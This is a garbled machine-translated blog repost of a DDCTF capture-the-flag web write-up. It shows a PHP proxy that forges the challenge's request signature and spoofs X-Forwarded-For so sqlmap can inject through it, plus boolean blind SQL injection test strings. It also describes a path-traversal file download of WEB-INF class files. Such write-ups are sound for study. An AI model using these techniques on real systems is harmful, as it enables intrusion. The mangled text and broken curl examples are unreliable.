Reproduce && think DDCTF web

Others 2019-09-25 18:42:03 views: null

Secret Web 1 database

Topic Address: http://116.85.43.88:8080/ZVDHKBUVUZSTJCNX/dfe3ia/index.php

Henryzhao master solution

Use a proxy to write a page of PHP, the request and signed proxy. After using common tools such as sqlmap inject the PHP page.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
 

@$id = $_REQUEST['id'];
@$title = $_REQUEST['title'];
@$author = $_REQUEST['author'];
@$date = $_REQUEST['date'];
$time = time();
$sig = sha1('id='.$id.'title='.$title.'author='.$author.'date='.$date.'time='.$time.'adrefkfweodfsdpiru');

$ch = curl_init();

$post = [
    'id' => $id,
    'title' => $title,
    'author' => $author,
    'date' => $date,
];

curl_setopt($ch, CURLOPT_URL,"http://116.85.43.88:8080/KREKGJVFPYQKERQR/dfe3ia/index.php?sig=$sig&time=$time");
curl_setopt($ch, CURLOPT_HTTPHEADER, array(
    'X-Forwarded-For: 123.232.23.245',
    ));
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, $post);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_HEADER, true);

$ch_out = curl_exec($ch);
$ch_info = curl_getinfo($ch);

$header = substr($ch_out, 0, $ch_info['header_size']);
$body = substr($ch_out, $ch_info['header_size']);

http_response_code($ch_info['http_code']);

//echo $header;
echo $body;

I used to write a python proxy TO DO:

Wfox master solution

Unlock the burpsuite "new features": burpsuite the match and replace

Gangster do not know how fuzz testing, their testing process:

1
2
 
admin ' and  . 1 # normally displays the result of admin
 admin' and  0 # appears empty

So a Boolean blind judge whether the conditions for the response body in there admin / test results returned!

Gangster script debugging it is still very troublesome, you need to modify js, not for me, but which use third-party libraries execjs python js code execution can learn about, though js function is actually executed a bit sha1 function: )

Attached basics

curl

command line tools and libarbry for transferring data with URLs

curl is a command-line tool, the role of a network request, and then extracted to obtain data showing the "standard output" (stdout) in the above. It supports multiple protocols, here its various uses

1
2
3
4
5
6
 
$ Curl -o URL # save the page
 $ curl -i URL # header information display
 $ curl -v www.sina.com `-v` parameter may be displayed to the entire process http communication, comprising port and http request header 
$ curl POST --data -X "the Data = xxx" example.com/form.cgi 
$ curl --header "Content-Type: the Application / json" http://example.com #
 $ curl --user name: password Example. COM # HTTP authentication

You can also form encoding, file upload etc.

See: http://www.ruanyifeng.com/blog/2011/09/curl.html

jsbeautifier : JS landscaping tools

Web 2 exclusive link

Bigwigs sensitivity to the html source code of good high base64

1
2
3
 
<title>滴滴一下,让出行更美好</title>
<link type="image/x-icon" href="http://www.xiaojukeji.com/images/favicon.ico" rel="icon">
<link href="/image/banner/ZmF2aWNvbi5pY28=" rel="shortcut icon">

The base64 decoded to get back links favicon.ico, 010 Editor open the picture, found you can only download .class .xml .ico .ks files, can determine the presence of any file download vulnerability.

Henryzhao master more powerful, direct observation of the logo exception ...

In addition, under the guidance of the master template can be found by similar Github source code disclosure, that is, the basic structure of the entire site

Spring default configuration file: applicationContext.xml, you can develop profiles, generically named web.xml

find from 500 error page

com.didichuxing.ctf.controller.user.FlagController.submitFlag(FlagController.java:36)

Thus obtaining the corresponding path

../../WEB-INF/classes/com/didichuxing/ctf/controller/user/FlagController.class

Use jd-gui (java decompile) get behind java java source code and related content decryption, temporarily not interested ...

Attached basics

JVM

JVM: (Java Virtual Machine): a virtual machine capable of running java bytecode, java language to realize the most important feature that the platform independence

Java compiler: the java source file (.java) file compiled into bytecode (.class are special binary file, binary file byte code), may be simply viewed as the javac.exe compiler java

Java interpreter: is part of the JVM. Java interpreter to explain the execution of the program after the Java compiler. java.exe can be simply seen as a Java interpreter.

HMAC

HMAC (Hash-Based Message Authentication Code) hash message authentication code, has a key and a message as input, generates as output a message digest.

Original: Large column  reproducibility && think DDCTF web


Guess you like

Origin www.cnblogs.com/petewell/p/11584609.html
Recommended
Ranking
[Algorithm] greedy _ program scheduling issues
Spring 控制反转(IOC)
Data structure-6.6 figure
Indicates that the class or member method has abstract properties
Huawei v5 server installed Linux operating system
Postgresql source code analysis - creating ordinary tables
Chapter 10 Evaluation Classification Results
Cloud service Ubuntu 20.04 version uses Nginx to deploy static web pages
Java Exercise 17.1
Solve the problem that git cannot automatically push submission in IDEA Push failed: Failed with error: Could not read from remote repository.
Daily
More
2024-05-09(32)
2024-05-08(18)
2024-05-07(34)
2024-05-06(6)
2024-05-05(0)
2024-05-04(18)
2024-05-03(8)
2024-05-02(0)
2024-05-01(4)
2024-04-30(36)

Code World

© 2018 codetd.com